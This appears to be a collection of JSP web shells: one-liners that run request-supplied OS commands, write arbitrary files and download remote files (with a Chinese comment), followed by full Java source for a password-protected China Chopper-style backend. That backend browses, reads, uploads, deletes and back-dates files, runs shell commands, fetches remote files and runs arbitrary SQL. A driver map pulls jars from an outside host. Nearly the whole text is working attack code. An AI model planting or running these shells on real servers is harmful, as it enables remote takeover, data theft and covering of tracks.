<%Runtime.getRuntime().exec(request.getParameter( "i" ));%> |
<% if ( "023" .equals(request.getParameter( "pwd" ))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter( "i" )).getInputStream(); int a = - 1 ; byte [] b = new byte [ 2048 ]; out.print( "<pre>" ); while ((a=in.read(b))!=- 1 ){ out.println( new String(b)); } out.print( "</pre>" ); } %> |
<% new java.io.FileOutputStream(request.getParameter( "f" )).write(request.getParameter( "c" ).getBytes());%> |
<% new java.io.FileOutputStream(application.getRealPath( "/" )+ "/" +request.getParameter( "f" )).write(request.getParameter( "c" ).getBytes());%> |
<% new java.io.RandomAccessFile(request.getParameter( "f" ), "rw" ).write(request.getParameter( "c" ).getBytes()); %> |
<% new java.io.RandomAccessFile(application.getRealPath( "/" )+ "/" +request.getParameter( "f" ), "rw" ).write(request.getParameter( "c" ).getBytes()); %> |
三:下载远程文件(不用apache io utils的话没办法把inputstream转byte,所以很长…)
<% java.io.InputStream in = new java.net.URL(request.getParameter( "u" )).openStream(); byte [] b = new byte [ 1024 ]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = - 1 ; while ((a = in.read(b)) != - 1 ) { baos.write(b, 0 , a); } new java.io.FileOutputStream(request.getParameter( "f" )).write(baos.toByteArray()); %> |
<% java.io.InputStream in = new java.net.URL(request.getParameter( "u" )).openStream(); byte [] b = new byte [ 1024 ]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = - 1 ; while ((a = in.read(b)) != - 1 ) { baos.write(b, 0 , a); } new java.io.FileOutputStream(application.getRealPath( "/" )+ "/" + request.getParameter( "f" )).write(baos.toByteArray()); %> |
<%=Class.forName( "Load" , true , new java.net.URLClassLoader( new java.net.URL[]{ new java.net.URL(request.getParameter( "u" ))})).getMethods()[ 0 ].invoke( null , new Object[]{request.getParameterMap()})%> |
import java.io.IOException; import java.util.HashMap; import java.util.Map; import java.util.Map.Entry; /* * To change this license header, choose License Headers in Project Properties. * To change this template file, choose Tools | Templates * and open the template in the editor. */ /** * * @author yz */ public class Load { public static String load(Map<String,String[]> map){ try { Map<String,String> request = new HashMap<String,String>(); for (Entry<String, String[]> entrySet : map.entrySet()) { String key = entrySet.getKey(); String value = entrySet.getValue()[ 0 ]; request.put(key, value); } return new Chopper().doPost(request); } catch (IOException ex) { return ex.toString(); } } } |
import java.io.BufferedInputStream; import java.io.BufferedReader; import java.io.BufferedWriter; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.OutputStreamWriter; import java.lang.reflect.Method; import java.net.HttpURLConnection; import java.net.URL; import java.net.URLClassLoader; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.Statement; import java.text.SimpleDateFormat; import java.util.Date; import java.util.Map; public class Chopper{ public static String getPassword() throws IOException { return "023" ; } String cs = "UTF-8" ; String encoding(String s) throws Exception { return new String(s.getBytes( "ISO-8859-1" ), cs); } Connection getConnection(String s) throws Exception { String[] x = s.trim().split( "\r\n" ); try { Class.forName(x[ 0 ].trim()); } catch (ClassNotFoundException e) { boolean classNotFound = true ; BufferedReader br = new BufferedReader( new InputStreamReader( this .getClass().getResourceAsStream( "/map.txt" ))); String str = "" ; while ((str = br.readLine()) != null ) { String[] arr = str.split( "=" ); if (arr.length == 2 && arr[ 0 ].trim().equals(x[ 0 ].trim())) { try { URLClassLoader ucl = (URLClassLoader) ClassLoader.getSystemClassLoader(); Method m = URLClassLoader. class .getDeclaredMethod( "addURL" , URL. class ); m.setAccessible( true ); m.invoke(ucl, new Object[]{ new URL(arr[ 1 ])}); Class.forName(arr[ 0 ].trim()); classNotFound = false ; break ; } catch (ClassNotFoundException ex) { throw ex; } } } if (classNotFound) { throw e; } } if (x[ 1 ].contains( "jdbc:oracle" )) { return DriverManager.getConnection(x[ 1 ].trim() + ":" + x[ 4 ], x[ 2 ].equalsIgnoreCase( "[/null]" ) ? "" : x[ 2 ], x[ 3 ].equalsIgnoreCase( "[/null]" ) ? "" : x[ 3 ]); } else { Connection c = DriverManager.getConnection(x[ 1 ].trim(), x[ 2 ].equalsIgnoreCase( "[/null]" ) ? "" : x[ 2 ], x[ 3 ].equalsIgnoreCase( "[/null]" ) ? "" : x[ 3 ]); if (x.length > 4 ) { c.setCatalog(x[ 4 ]); } return c; } } void listRoots(ByteArrayOutputStream out) throws Exception { File r[] = File.listRoots(); for (File f : r) { out.write((f.getName()).getBytes(cs)); } } void dir(String s, ByteArrayOutputStream out) throws Exception { File l[] = new File(s).listFiles(); for (File f : l) { String mt = new SimpleDateFormat( "yyyy-MM-dd HH:mm:ss" ).format( new Date(f.lastModified())); String rw = f.canRead() ? "R" : "" + (f.canWrite() ? " W" : "" ); out.write((f.getName() + (f.isDirectory() ? "/" : "" ) + "\t" + mt + "\t" + f.length() + "\t" + rw + "\n" ).getBytes(cs)); } } void deleteFiles(File f) throws Exception { if (f.isDirectory()) { File x[] = f.listFiles(); for (File fs : x) { deleteFiles(fs); } } f.delete(); } byte [] readFile(String s) throws Exception { int n; byte [] b = new byte [ 1024 ]; BufferedInputStream bis = new BufferedInputStream( new FileInputStream(s)); ByteArrayOutputStream bos = new ByteArrayOutputStream(); while ((n = bis.read(b)) != - 1 ) { bos.write(b, 0 , n); } bis.close(); return bos.toByteArray(); } void upload(String s, String d) throws Exception { String h = "0123456789ABCDEF" ; File f = new File(s); f.createNewFile(); FileOutputStream os = new FileOutputStream(f); for ( int i = 0 ; i < d.length(); i += 2 ) { os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1 )))); } os.close(); } void filesMove(File sf, File df) throws Exception { if (sf.isDirectory()) { if (!df.exists()) { df.mkdir(); } File z[] = sf.listFiles(); for (File z1 : z) { filesMove( new File(sf, z1.getName()), new File(df, z1.getName())); } } else { FileInputStream is = new FileInputStream(sf); FileOutputStream os = new FileOutputStream(df); int n; byte [] b = new byte [ 1024 ]; while ((n = is.read(b)) != - 1 ) { os.write(b, 0 , n); } is.close(); os.close(); } } void fileMove(File s, File d) throws Exception { s.renameTo(d); } void mkdir(File s) throws Exception { s.mkdir(); } void setLastModified(File s, String t) throws Exception { s.setLastModified( new SimpleDateFormat( "yyyy-MM-dd HH:mm:ss" ).parse(t).getTime()); } void downloadRemoteFile(String s, String d) throws Exception { int n = 0 ; FileOutputStream os = new FileOutputStream(d); HttpURLConnection h = (HttpURLConnection) new URL(s).openConnection(); InputStream is = h.getInputStream(); byte [] b = new byte [ 1024 ]; while ((n = is.read(b)) != - 1 ) { os.write(b, 0 , n); } os.close(); is.close(); h.disconnect(); } void inputStreamToOutPutStream(InputStream is, ByteArrayOutputStream out) throws Exception { int i = - 1 ; byte [] b = new byte [ 1024 ]; while ((i = is.read(b)) != - 1 ) { out.write(b, 0 , i); } } void getCurrentDB(String s, ByteArrayOutputStream out) throws Exception { Connection c = getConnection(s); ResultSet r = s.contains( "jdbc:oracle" ) ? c.getMetaData().getSchemas() : c.getMetaData().getCatalogs(); while (r.next()) { out.write((r.getObject( 1 ) + "\t" ).getBytes(cs)); } r.close(); c.close(); } void getTableName(String s, ByteArrayOutputStream out) throws Exception { Connection c = getConnection(s); String[] x = s.trim().split( "\r\n" ); ResultSet r = c.getMetaData().getTables( null , s.contains( "jdbc:oracle" ) ? x.length > 5 ? x[ 5 ] : x[ 4 ] : null , "%" , new String[]{ "TABLE" }); while (r.next()) { out.write((r.getObject( "TABLE_NAME" ) + "\t" ).getBytes(cs)); } r.close(); c.close(); } void getTableColumn(String s, ByteArrayOutputStream out) throws Exception { String[] x = s.trim().split( "\r\n" ); Connection c = getConnection(s); ResultSet r = c.prepareStatement( "select * from " + x[x.length - 1 ]).executeQuery(); ResultSetMetaData d = r.getMetaData(); for ( int i = 1 ; i <= d.getColumnCount(); i++) { out.write((d.getColumnName(i) + " (" + d.getColumnTypeName(i) + ")\t" ).getBytes(cs)); } r.close(); c.close(); } void executeQuery(String cs, String s, String q, ByteArrayOutputStream out, String p) throws Exception { Connection c = getConnection(s); Statement m = c.createStatement( 1005 , 1008 ); BufferedWriter bw = null ; try { boolean f = q.contains( "--f:" ); ResultSet r = m.executeQuery(f ? q.substring( 0 , q.indexOf( "--f:" )) : q); ResultSetMetaData d = r.getMetaData(); int n = d.getColumnCount(); for ( int i = 1 ; i <= n; i++) { out.write((d.getColumnName(i) + "\t|\t" ).getBytes(cs)); } out.write(( "\r\n" ).getBytes(cs)); if (f) { File file = new File(p); if (!q.contains( "-to:" )) { file.mkdir(); } bw = new BufferedWriter( new OutputStreamWriter( new FileOutputStream( new File(q.contains( "-to:" ) ? p.trim() : p + q.substring(q.indexOf( "--f:" ) + 4 , q.length()).trim()), true ), cs)); } while (r.next()) { for ( int i = 1 ; i <= n; i++) { if (f) { bw.write(r.getObject(i) + "" + "\t" ); bw.flush(); } else { out.write((r.getObject(i) + "" + "\t|\t" ).getBytes(cs)); } } if (bw != null ) { bw.newLine(); } out.write(( "\r\n" ).getBytes(cs)); } r.close(); if (bw != null ) { bw.close(); } } catch (Exception e) { out.write(( "Result\t|\t\r\n" ).getBytes(cs)); try { m.executeUpdate(q); out.write(( "Execute Successfully!\t|\t\r\n" ).getBytes(cs)); } catch (Exception ee) { out.write((ee.toString() + "\t|\t\r\n" ).getBytes(cs)); } } m.close(); c.close(); } public String doPost(Map<String,String>request) throws IOException { cs = request.get( "z0" ) != null ? request.get( "z0" ) + "" : cs; ByteArrayOutputStream out = new ByteArrayOutputStream(); try { char z = ( char ) request.get(getPassword()).getBytes()[ 0 ]; String z1 = encoding(request.get( "z1" ) + "" ); String z2 = encoding(request.get( "z2" ) + "" ); out.write( "->|" .getBytes(cs)); String s = new File( "" ).getCanonicalPath(); byte [] returnTrue = "1" .getBytes(cs); switch (z) { case 'A' : out.write((s + "\t" ).getBytes(cs)); if (!s.substring( 0 , 1 ).equals( "/" )) { listRoots(out); } break ; case 'B' : dir(z1, out); break ; case 'C' : String l = "" ; BufferedReader br = new BufferedReader( new InputStreamReader( new FileInputStream( new File(z1)))); while ((l = br.readLine()) != null ) { out.write((l + "\r\n" ).getBytes(cs)); } br.close(); break ; case 'D' : BufferedWriter bw = new BufferedWriter( new OutputStreamWriter( new FileOutputStream( new File(z1)))); bw.write(z2); bw.flush(); bw.close(); out.write(returnTrue); break ; case 'E' : deleteFiles( new File(z1)); out.write( "1" .getBytes(cs)); break ; case 'F' : out.write(readFile(z1)); case 'G' : upload(z1, z2); out.write(returnTrue); break ; case 'H' : filesMove( new File(z1), new File(z2)); out.write(returnTrue); break ; case 'I' : fileMove( new File(z1), new File(z2)); out.write(returnTrue); break ; case 'J' : mkdir( new File(z1)); out.write(returnTrue); break ; case 'K' : setLastModified( new File(z1), z2); out.write(returnTrue); break ; case 'L' : downloadRemoteFile(z1, z2); out.write(returnTrue); break ; case 'M' : String[] c = {z1.substring( 2 ), z1.substring( 0 , 2 ), z2}; Process p = Runtime.getRuntime().exec(c); inputStreamToOutPutStream(p.getInputStream(), out); inputStreamToOutPutStream(p.getErrorStream(), out); break ; case 'N' : getCurrentDB(z1, out); break ; case 'O' : getTableName(z1, out); break ; case 'P' : getTableColumn(z1, out); break ; case 'Q' : executeQuery(cs, z1, z2, out, z2.contains( "-to:" ) ? z2.substring(z2.indexOf( "-to:" ) + 4 , z2.length()) : s.replaceAll( "\\\\" , "/" ) + "images/" ); break ; } } catch (Exception e) { out.write(( "ERROR" + ":// " + e.toString()).getBytes(cs)); } out.write(( "|<-" ).getBytes(cs)); return new String(out.toByteArray()); } } |
oracle.jdbc.driver.OracleDriver=http: //p2j.cn/jdbc/classes12.jar com.mysql.jdbc.Driver=http: //p2j.cn/jdbc/mysql-connector-java-5.1.14-bin.jar com.microsoft.jdbc.sqlserver.SQLServerDriver=http: //p2j.cn/jdbc/sqlserver2000/msbase.jar,http://p2j.cn/jdbc/sqlserver2000/mssqlserver.jar,http://p2j.cn/jdbc/sqlserver2000/msutil.jar com.microsoft.sqlserver.jdbc.SQLServerDriver=http: //p2j.cn/jdbc/sqljdbc4.jar com.ibm.db2.jcc.DB2Driver=http: //p2j.cn/jdbc/db2java.jar com.informix.jdbc.IfxDriver=http: //p2j.cn/jdbc/ifxjdbc.jar com.sybase.jdbc3.jdbc.SybDriver=http: //p2j.cn/jdbc/jconn3d.jar org.postgresql.Driver=http: //p2j.cn/jdbc/postgresql-9.2-1003.jdbc4.jar com.ncr.teradata.TeraDriver=http: //p2j.cn/jdbc/teradata-jdbc4- com.hxtt.sql.access.AccessDriver=http: //p2j.cn/jdbc/Access_JDBC30.jar org.apache.derby.jdbc.ClientDriver=http: //p2j.cn/jdbc/derby.jar org.hsqldb.jdbcDriver=http: //p2j.cn/jdbc/hsqldb.jar net.sourceforge.jtds.jdbc.Driver=http: //p2j.cn/jdbc/jtds-1.2.5.jar mongodb=http: //p2j.cn/jdbc/mongo-java-driver-2.9.3.jar |